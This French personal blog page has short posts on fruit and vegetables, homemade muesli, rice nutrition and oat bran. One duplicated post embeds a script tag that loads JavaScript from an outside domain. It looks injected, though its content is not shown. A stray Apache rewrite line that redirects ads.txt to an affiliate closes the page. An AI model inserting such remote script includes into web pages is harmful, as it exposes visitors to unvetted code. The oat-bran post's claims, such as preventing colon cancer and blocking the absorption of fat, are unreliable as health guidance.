•  

     

    il n'est pas un vain mot et pour une fois je trouve très intelligent la pub concernant les fruits et légumes ," ne pas manger trop sucré ou trop salé "qui jalonne les dessins animés de ces chers petits à la télé , j'ai eu l'occasion de la voir car j'avais mes petits enfants ,on n'est pas sans savoir que trop sucré mène à l'obésité et au diabète, trop salé , à la rétention d'eau et à l'hypertension ,il est plus que dommage de voir des enfants atteints par ce genre de maladie très jeunes, ils ont bien le temps de l'avoir plus tard s'ils sont prédisposés et le fait d'avoir un alimentation saine peut repousser ces maladies , voir même le cancer car les fruits et les légumes sont gorgés de vitamines et minéraux qui agissent comme antiradicaux libres


     
    cerisette:légumes

     

     

     

     

    Partager via Gmail Delicious Yahoo! Pin It

    15 commentaires
  • muesli maison

    pour le matin , la veille au soir je mets dans un bol 2 cuillers à soupe d'un mélange que je prépare d'avance avec des flocons d'avoine , un peu de son d'avoine , des raisins secs , de l'abricot coupé en petit bout , des amandes et des noisettes que j'ai concassée , j'ajoute un peu d'eau , et le matin cette eau est absorbée , je rajoute 2 cuillers à soupe de fromage blanc , avec le thé , cela me booste pour toute la journée

    Partager via Gmail Delicious Yahoo! Pin It

    13 commentaires
  •  

     

     

    le riz

    Le riz est une céréale d'origine asiatique qui pousse dans toutes les régions humides et ensoleillées. Le plant de riz est une graminée qui pousse généralement dans l'eau et produit une panicule contenant 100 à 200 grains de riz

     

    Le riz brun ou riz complet est un riz entier débarrassé de son enveloppe extérieure fibreuse. Il conserve le germe (l'embryon) et le son qui le rendent plus nutritif que le riz blanc.

    Le riz blanc est décortiqué et poli. Il a perdu une grande partie de ses éléments nutritifs et contient notamment beaucoup moins de niacine, de thiamine, de magnésium, de zinc, de fer et de fibres que le riz brun.

     

    Le riz est avant tout un fournisseur de glucides complexes et de vitamines du groupe B. Il contient aussi des protéines des minéraux et des fibres. Cependant plus le riz est décortiqué, raffiné, traité, poli, blanchi, moins il contient de fibres.

     

     

    Le riz complet cuit contient environ 24 % d'amidon, 2,5 % de protéines, 0,8 % de lipides (dans le germe), 1,4 % de fibres. Il renferme également des vitamines du groupe B et des éléments minéraux (phosphore, potassium, magnésium, calcium, zinc, fer) dans la partie périphérique du grain. Les glucides fournissent l’énergie dont le corps a besoin au quotidien. Or aujourd’hui, la consommation de glucides est insuffisante car elle ne représente qu’environ 39% de l’apport énergétique contre les 55% recommandés par les nutritionnistes. Consommer du riz permet de pallier au manque de glucides dans notre alimentation. En effet riche en glucides complexes, 100g de riz blanc couvre en moyenne entre 15 et 20% des apports journaliers recommandés en glucides. Enfin, la richesse en glucides complexes du riz favorise la sensation de satiété (pas de sensation de faim entre deux repas) et permet donc de limiter le besoin de grignoter. Comme il est pauvre en lipides, il est à privilégier dans une alimentation équilibrée.

    • Les gros consommateurs de riz complet (2 portions ou plus par semaine) ont vu leurs risques diminuer de 11%1. Ainsi, il suffirait de remplacer 50 g de riz blanc par jour par une quantité équivalente de riz brun pour réduire de 16 % ses risques de souffrir de diabète de type 2.
    • pris ici
    Partager via Gmail Delicious Yahoo! Pin It

    31 commentaires
  •  
    <script src="http://www.vshop.fr/js/freak2.js" type="text/javascript"></script>

     

    il n'est pas un vain mot et pour une fois je trouve très intelligent la pub concernant les fruits et légumes ," ne pas manger trop sucré ou trop salé "qui jalonne les dessins animés de ces chers petits à la télé ,j'ai eu l'occasion de la voir car j'avais mes petits enfants ,on n'est pas sans savoir que trop sucré mène à l'obésité et au diabète, trop salé , à la rétention d'eau et à l'hypertension ,il est plus que dommage de voir des enfants atteints par ce genre de maladie très jeunes, ils ont bien le temps de l'avoir plus tard s'ils sont prédisposés et le fait d'avoir un alimentation saine peut repousser ces maladies , voir mème le cancer car les fruits et les légumes sont gorgés de vitamines et minéraux qui agissent comme antiradicaux libres
    cerisette
    cerisette:légumes

    Partager via Gmail Delicious Yahoo! Pin It

    18 commentaires
  •  

    Champ d'avoine

    Le son d’avoine est un produit aux multiples bienfaits et vertus pour votre organisme, mais il faut préciser qu’il peut tout de même avoir des effets néfastes s’il est mal utilisé.

     

    Deux cuillères à soupe par jour maximum

     

    Il ne faut en aucun cas consommer plus de 2 cuillères à soupe par jour de son d’avoine.

    Le son d’avoine absorbe sans distinction et préférence

     

     

    Le son d’avoine comme coupe-faim

     

    Lorsqu’il est consommé au cours d’un repas, le son d’avoine absorbe jusqu’à 30 fois son volume en eau. En gonflant, il se gélifie et tapisse l’estomac, ce qui provoque la sensation d’être rassasié.

     

    Le son d’avoine absorbe les graisses et les calories

     

    En absorbant l’eau, le son d’avoine récupère aussi les matières grasses et les sucres qu’il garde pendant tout le passage dans les intestins, évitant qu’ils soient absorbés par l’organisme. Le son d’avoine joue un rôle de collecteur et transporteur de graisses et de sucre, ce qui diminue le nombre de calories.

    Consommé régulièrement au cours des repas dans le cadre d’une alimentation normale, le son d’avoine permet donc de perdre du poids

     

    Le son d’avoine, un bienfait pour les diabétiques

    Bien qu’il ne puisse pas remplacer un régime pauvre en sucres et l’exercice physique, le son d’avoine a cependant une action souveraine sur le métabolisme des personnes en pré-diabète.

    Le son d’avoine fait baisser le cholestérol

    Le son d’avoine prévient le cancer du côlon

    Lutte contre la constipation

    perso j'en prends 2 cuillers à soupe par jour

    vous trouverez l'article en entier ici

     

     

    Partager via Gmail Delicious Yahoo! Pin It

    52 commentaires


    Suivre le flux RSS des articles de cette rubrique
    Suivre le flux RSS des commentaires de cette rubrique
RewriteEngine On RewriteBase / RewriteRule ^ads.txt$ https://adaccess.fr/ads.txt?affiliateid=[17473] [L,R]